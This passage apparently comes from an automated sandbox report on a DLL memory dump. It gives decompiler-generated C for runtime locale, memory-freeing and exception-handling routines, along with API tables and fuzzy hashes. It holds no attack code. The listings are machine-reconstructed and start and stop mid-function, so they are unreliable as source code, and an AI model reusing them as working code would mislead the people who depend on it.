							if(_t108 == 0) {
								L22:
								L23:
								return E6EE361A7(_v8 ^ _t109);
							}
							_t55 = IsValidCodePage(_t108 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t108;
							}
							E6EE44EE2(_v16,  &(_v24[0x94]), 0x55, _t103);
							__eflags = _t88;
							if(_t88 == 0) {
								L34:
								goto L23;
							}
							_t33 =  &(_t88[0x90]); // 0xd0
							E6EE44EE2(_v16, _t33, 0x55, _t103);
							_t65 = GetLocaleInfoW(_v16, 0x1001, _t88, 0x40);
							__eflags = _t65;
							if(_t65 == 0) {
								goto L22;
							}
							_t36 =  &(_t88[0x40]); // 0x30
							_t67 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t67;
							if(_t67 == 0) {
								goto L22;
							}
							_t38 =  &(_t88[0x80]); // 0xb0
							E6EE484EA(_t38, _t108, _t38, 0x10, 0xa);
							goto L34;
						}
						_t74 =  *0x6ee623fc; // 0x41
						_t76 = E6EE527AD(_t91, _t99, 0x6ee620f0, _t74 - 1, _v24);
						_t110 = _t110 + 0xc;
						if(_t76 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t77 =  *_t102;
						_t103 = 0;
						if(_t77 == 0) {
							L14:
							E6EE52235(_t91, _t99, __eflags, _t127,  &_v20);
							L15:
							_pop(_t91);
							goto L21;
						}
						_t123 =  *_t77;
						if( *_t77 == 0) {
							goto L14;
						}
						E6EE5219A(_t91, _t99, _t123, _t127,  &_v20);
						goto L15;
					}
					_t119 =  *_t71 - _t99;
					if( *_t71 == _t99) {
						goto L8;
					}
					E6EE5219A(_t91, _t99, _t119, _t127,  &_v20);
					goto L9;
				}
			}

0x6ee5280e
0x6ee52816
0x6ee5281d
0x6ee52824
0x6ee52828
0x6ee5282c
0x6ee5283a
0x6ee5283f
0x6ee52840
0x6ee52841
0x6ee52842
0x6ee5284a
0x6ee5284c
0x6ee52852
0x6ee52858
0x6ee5285b
0x6ee5285d
0x6ee52860
0x6ee52864
0x6ee5286b
0x6ee52878
0x6ee5287d
0x6ee52880
0x6ee52883
0x6ee52883
0x6ee52885
0x6ee52888
0x6ee5288c
0x6ee528fc
0x6ee528fe
0x6ee52900
0x6ee52913
0x6ee52913
0x6ee5291a
0x6ee52920
0x6ee52923
0x00000000
0x6ee52923
0x6ee52902
0x6ee52905
0x00000000
0x00000000
0x6ee5290b
0x6ee52910
0x00000000
0x6ee52893
0x6ee52893
0x6ee52897
0x6ee528a9
0x6ee528ad
0x6ee528b2
0x6ee528b6
0x6ee528b7
0x6ee5293f
0x6ee5293f
0x6ee52941
0x6ee5294d
0x6ee52957
0x6ee5295b
0x6ee5295d
0x6ee5292e
0x6ee52930
0x6ee5293e
0x6ee5293e
0x6ee52963
0x6ee52969
0x6ee5296b
0x00000000
0x00000000
0x6ee52972
0x6ee52978
0x6ee5297a
0x00000000
0x00000000
0x6ee5297c
0x6ee5297f
0x6ee52981
0x6ee52983
0x6ee52983
0x6ee52994
0x6ee52999
0x6ee5299b
0x6ee529fb
0x00000000
0x6ee529fd
0x6ee529a0
0x6ee529aa
0x6ee529ba
0x6ee529c0
0x6ee529c2
0x00000000
0x00000000
0x6ee529ca
0x6ee529d9
0x6ee529df
0x6ee529e1
0x00000000
0x00000000
0x6ee529eb
0x6ee529f3
0x00000000
0x6ee529f8
0x6ee528bd
0x6ee528cc
0x6ee528d1
0x6ee528d6
0x6ee52926
0x6ee52926
0x6ee52926
0x6ee52928
0x6ee5292c
0x00000000
0x00000000
0x00000000
0x6ee5292c
0x6ee528d8
0x6ee528da
0x6ee528de
0x6ee528f0
0x6ee528f4
0x6ee528f9
0x6ee528f9
0x00000000
0x6ee528f9
0x6ee528e0
0x6ee528e3
0x00000000
0x00000000
0x6ee528e9
0x00000000
0x6ee528e9
0x6ee52899
0x6ee5289c
0x00000000
0x00000000
0x6ee528a2
0x00000000
0x6ee528a2

APIs

Part of subcall function 6EE444CA: GetLastError.KERNEL32(?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?,?,6EDB28E8,?), ref: 6EE444CF
Part of subcall function 6EE444CA: SetLastError.KERNEL32(00000000,00000007,000000FF,?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?), ref: 6EE4456D

Part of subcall function 6EE444CA: _free.LIBCMT ref: 6EE4452C
Part of subcall function 6EE444CA: _free.LIBCMT ref: 6EE44562

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6EE5291A
IsValidCodePage.KERNEL32(00000000), ref: 6EE52963
IsValidLocale.KERNEL32(?,00000001), ref: 6EE52972
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6EE529BA
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6EE529D9

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 236c413d79ca733c5a67071d773a88e8ddcc00d5e6af6cbb660848ba58868556
Instruction ID: ca9d1b3e5a1e73484915f38fe6ddcb775c981fb77651b8ddcee1a02cc31001f3
Opcode Fuzzy Hash: 236c413d79ca733c5a67071d773a88e8ddcc00d5e6af6cbb660848ba58868556
Instruction Fuzzy Hash: E7518371A10206DFEF50DFE5CC50AAE73B8AF2D304F204869E914EB380DB729A558B61

Uniqueness

Uniqueness Score: -1.00%

Function 6EE37375, Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6EE37375(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E6EE37490(_t34);
				 *_t60 = 0x2cc;
				_v632 = E6EE38EC0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E6EE38EC0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E6EE37490(_t49);
				}
				return _t49;
			}

0x6ee37375
0x6ee37375
0x6ee37375
0x6ee37389
0x6ee3738b
0x6ee3738e
0x6ee3738e
0x6ee37392
0x6ee37397
0x6ee373af
0x6ee373b5
0x6ee373bb
0x6ee373c1
0x6ee373c7
0x6ee373cd
0x6ee373d3
0x6ee373da
0x6ee373e1
0x6ee373e8
0x6ee373ef
0x6ee373f6
0x6ee373fd
0x6ee373fe
0x6ee37407
0x6ee3740d
0x6ee37410
0x6ee37416
0x6ee37425
0x6ee37431
0x6ee3743c
0x6ee37443
0x6ee3744a
0x6ee37455
0x6ee3745d
0x6ee37466
0x6ee37468
0x6ee3746b
0x6ee3746d
0x6ee37477
0x6ee3747f
0x6ee37485
0x00000000
0x6ee3748c
0x6ee3748f

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6EE37381
IsDebuggerPresent.KERNEL32 ref: 6EE3744D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6EE3746D
UnhandledExceptionFilter.KERNEL32(?), ref: 6EE37477

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 89ac493865f36593ba4c4dd7ec46c69997f8fc77037bd3b09a810b8ab3769fc0
Instruction ID: 73a93d4db94939c602e28a730ef9abfd5bfa86beee19b5aeb6a5fcf08d32a425
Opcode Fuzzy Hash: 89ac493865f36593ba4c4dd7ec46c69997f8fc77037bd3b09a810b8ab3769fc0
Instruction Fuzzy Hash: 0B31F475D1522D9ADB10DFA4D989BCDBBB8AF08304F2045AAE409AA290EB755A84CF44

Uniqueness

Uniqueness Score: -1.00%

Function 6EE3AABA, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6EE3ABB2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6EE3ABBC
UnhandledExceptionFilter.KERNEL32(?), ref: 6EE3ABC9

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 3b68592fed09d8488223b383948a20ce2fe4572cf9b1bff3ba1b05b42dbf79d6
Instruction ID: 13e5e8f229f1a49000abc4180eb56b48c24a0b51ea74bf73f1a8f24049d0b190
Opcode Fuzzy Hash: 3b68592fed09d8488223b383948a20ce2fe4572cf9b1bff3ba1b05b42dbf79d6
Instruction Fuzzy Hash: F531C475911329ABCF61DF64D888BCDBBB8AF08314F6045EAE41CA6290E7749F85CF44

Uniqueness

Uniqueness Score: -1.00%

Function 6EE5219A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 6EE444CA: GetLastError.KERNEL32(?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?,?,6EDB28E8,?), ref: 6EE444CF
Part of subcall function 6EE444CA: SetLastError.KERNEL32(00000000,00000007,000000FF,?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?), ref: 6EE4456D

EnumSystemLocalesW.KERNEL32(6EE522C0,00000001,00000000,?,-00000050,?,6EE528EE,00000000,?,?,?,00000055,?), ref: 6EE5220C

Strings

(n, xrefs: 6EE521E1

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID: (n
API String ID: 2417226690-91604842
Opcode ID: 44a97fc71d665b9e1739feb07ef778cf6792f74891189544e48cb8da2b843ec5
Instruction ID: 501d920dc8667a154434c928ba1191bc24264a9a5bd8826e6d1c53d350f97f8f
Opcode Fuzzy Hash: 44a97fc71d665b9e1739feb07ef778cf6792f74891189544e48cb8da2b843ec5
Instruction Fuzzy Hash: AB11063A2147019FDB089FB898906AAB7B1FB84358F28882DD94647740D7327552CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6EE370CB, Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6EE370E1

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 662fc78f61b3713efb1cce8616990e9f7f6beacfc7ea02935156b9d4537df9be
Instruction ID: 4a0b8e15dc7783da6e3b049d5195eeb068412124490fdd1cf7899e5fab1aafd3
Opcode Fuzzy Hash: 662fc78f61b3713efb1cce8616990e9f7f6beacfc7ea02935156b9d4537df9be
Instruction Fuzzy Hash: AC516CB2A24626CFEF55CF95C8917AAB7F1FB49314F30896AD415EB381D3B49A00CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6EE52235, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 6EE444CA: GetLastError.KERNEL32(?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?,?,6EDB28E8,?), ref: 6EE444CF
Part of subcall function 6EE444CA: SetLastError.KERNEL32(00000000,00000007,000000FF,?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?), ref: 6EE4456D

EnumSystemLocalesW.KERNEL32(6EE52513,00000001,?,?,-00000050,?,6EE528B2,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6EE5227F

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 9f65017bd6807b1c7af7bf49bfa09a78e307a34c8f51770ea4d8e4783d54dcd3
Instruction ID: 34dcbc3baf222d95082b16540a090d7901055042dcb1cf609fb3d25b256b8fec
Opcode Fuzzy Hash: 9f65017bd6807b1c7af7bf49bfa09a78e307a34c8f51770ea4d8e4783d54dcd3
Instruction Fuzzy Hash: 50F0F63E2143046FDB185FB5A890B7A7BA5EF8436CF29882DE9454B780D772A852C650

Uniqueness

Uniqueness Score: -1.00%

Function 6EE4480E, Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 6EE40E0E: EnterCriticalSection.KERNEL32(-6EE78FF0,?,6EE42C3C,00000000,6EE68AD0,0000000C,6EE42C03,?,?,6EE447D7,?,?,6EE4466C,00000001,00000364,00000007), ref: 6EE40E1D

EnumSystemLocalesW.KERNEL32(6EE44801,00000001,6EE68BD0,0000000C,6EE44CE0,00000000), ref: 6EE44846

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: d2919818780aff263f54adae0a6b5bf6360fcaddfb072ba22e9a83eddc614e84
Instruction ID: bc6e2d1f9db32c2afed87cc6e06478da0d029782d010a7fa3494e4211d271fa9
Opcode Fuzzy Hash: d2919818780aff263f54adae0a6b5bf6360fcaddfb072ba22e9a83eddc614e84
Instruction Fuzzy Hash: 45F0E776A00614EFEB00DF98E445B9A77B4FB49365F20452AF9119B390D7769A41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6EE5214F, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 6EE444CA: GetLastError.KERNEL32(?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?,?,6EDB28E8,?), ref: 6EE444CF
Part of subcall function 6EE444CA: SetLastError.KERNEL32(00000000,00000007,000000FF,?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?), ref: 6EE4456D

EnumSystemLocalesW.KERNEL32(6EE520A8,00000001,?,?,?,6EE52910,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 6EE52186

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: d30f3c179af5ccc39f04af3b07f2dd0b2078c9b1c0b2b9e8ecfc2c88524c3ae3
Instruction ID: 8bf006c0ac19cb8ffe832ed2eded00c9ff7cc3793823d848dc947e29f8a2c564
Opcode Fuzzy Hash: d30f3c179af5ccc39f04af3b07f2dd0b2078c9b1c0b2b9e8ecfc2c88524c3ae3
Instruction Fuzzy Hash: 1EF0553630020467CB049FB5D904B6B7FB4EFC6354F6A805DEA098B380C3329843C750

Uniqueness

Uniqueness Score: -1.00%

Function 6EE44DE4, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,6EE4788D,?,20001004,00000000,00000002,?,?,6EE46E9A), ref: 6EE44E18

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: a4b19b4702a3881837cf190fca52cdf4dd934fafb1a3276875413bad3035074f
Instruction ID: 81d11029bc11be3956b39b5ec004e504744215355af40b215b2beaa2689899bc
Opcode Fuzzy Hash: a4b19b4702a3881837cf190fca52cdf4dd934fafb1a3276875413bad3035074f
Instruction Fuzzy Hash: FBE01A32640629FBCF121EE1ED04E9E3B1AEB45751F108816FD1469250CB329932AAD1

Uniqueness

Uniqueness Score: -1.00%

Function 6EE4E989, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EE4E989(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6ee77b80) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6EE4471C(_t46);
							E6EE50AF6( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6EE4471C(_t47);
							E6EE50FAA( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6EE4471C( *((intOrPtr*)(_t74 + 0x7c)));
						E6EE4471C( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6EE4471C( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6EE4471C( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6EE4471C( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6EE4471C( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6EE4EAFA( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6ee77ce8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6EE4471C(_t31);
							E6EE4471C( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6EE4471C(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6EE4471C(_t74);
			}

0x6ee4e991
0x6ee4e995
0x6ee4e99d
0x6ee4e9a6
0x6ee4e9ab
0x6ee4e9b2
0x6ee4e9ba
0x6ee4e9c2
0x6ee4e9cd
0x6ee4e9d3
0x6ee4e9d4
0x6ee4e9dc
0x6ee4e9e4
0x6ee4e9ef
0x6ee4e9f5
0x6ee4e9f9
0x6ee4ea04
0x6ee4ea0a
0x6ee4e9ab
0x6ee4ea0b
0x6ee4ea13
0x6ee4ea26
0x6ee4ea39
0x6ee4ea47
0x6ee4ea52
0x6ee4ea57
0x6ee4ea60
0x6ee4ea68
0x6ee4ea69
0x6ee4ea6f
0x6ee4ea72
0x6ee4ea75
0x6ee4ea7c
0x6ee4ea7e
0x6ee4ea82
0x6ee4ea8a
0x6ee4ea91
0x6ee4ea97
0x6ee4ea98
0x6ee4ea98
0x6ee4ea9f
0x6ee4eaa1
0x6ee4eaa6
0x6ee4eaae
0x6ee4eab3
0x6ee4eab4
0x6ee4eab4
0x6ee4eab7
0x6ee4eaba
0x6ee4eabd
0x6ee4eac0
0x6ee4eac0
0x6ee4ead0

APIs

___free_lconv_mon.LIBCMT ref: 6EE4E9CD

Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50B13
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50B25
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50B37
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50B49
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50B5B
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50B6D
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50B7F
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50B91
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50BA3
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50BB5
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50BC7
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50BD9
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50BEB

_free.LIBCMT ref: 6EE4E9C2

Part of subcall function 6EE4471C: RtlFreeHeap.NTDLL(00000000,00000000,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?), ref: 6EE44732
Part of subcall function 6EE4471C: GetLastError.KERNEL32(?,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?,?), ref: 6EE44744

_free.LIBCMT ref: 6EE4E9E4
_free.LIBCMT ref: 6EE4E9F9
_free.LIBCMT ref: 6EE4EA04
_free.LIBCMT ref: 6EE4EA26
_free.LIBCMT ref: 6EE4EA39
_free.LIBCMT ref: 6EE4EA47
_free.LIBCMT ref: 6EE4EA52
_free.LIBCMT ref: 6EE4EA8A
_free.LIBCMT ref: 6EE4EA91
_free.LIBCMT ref: 6EE4EAAE
_free.LIBCMT ref: 6EE4EAC6

Strings

|n, xrefs: 6EE4EA75

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: |n
API String ID: 161543041-3370561121
Opcode ID: 6eb51edce57b71c3c17ea7c65c38a2f883622c18deca10fe3a3766d19a6ed3ec
Instruction ID: 30bf38494907228dc053a375dac325e71ac976ad843716dc3bb747ca8e3fd7b6
Opcode Fuzzy Hash: 6eb51edce57b71c3c17ea7c65c38a2f883622c18deca10fe3a3766d19a6ed3ec
Instruction Fuzzy Hash: 72315F71614A01DFEB61DEF8E848B967BE8BF01358F30481AE055DB3A5DB70E941DB10

Uniqueness

Uniqueness Score: -1.00%

Function 6EE3E828, Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 403
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E6EE3E828(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __fp0, char _a4, char _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20, char* _a24) {
				char _v0;
				signed int _v8;
				char _v12;
				char _v16;
				char _v532;
				signed int _v536;
				signed int _v540;
				WCHAR* _v544;
				signed int _v548;
				intOrPtr* _v552;
				WCHAR* _v556;
				intOrPtr _v576;
				intOrPtr* _v580;
				intOrPtr* _v584;
				intOrPtr* _v588;
				intOrPtr* _v592;
				intOrPtr* _v596;
				void* __ebp;
				signed int _t93;
				void* _t97;
				void* _t101;
				signed int _t102;
				void* _t119;
				void* _t121;
				void* _t122;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr _t130;
				void* _t132;
				void* _t133;
				void* _t134;
				void* _t135;
				void* _t137;
				void* _t138;
				void* _t139;
				intOrPtr _t140;
				intOrPtr _t141;
				void* _t145;
				void* _t146;
				void* _t147;
				intOrPtr _t148;
				intOrPtr _t149;
				void* _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t160;
				void* _t161;
				signed int _t162;
				WCHAR* _t164;
				char* _t165;
				char* _t166;
				char* _t169;
				char* _t170;
				void* _t173;
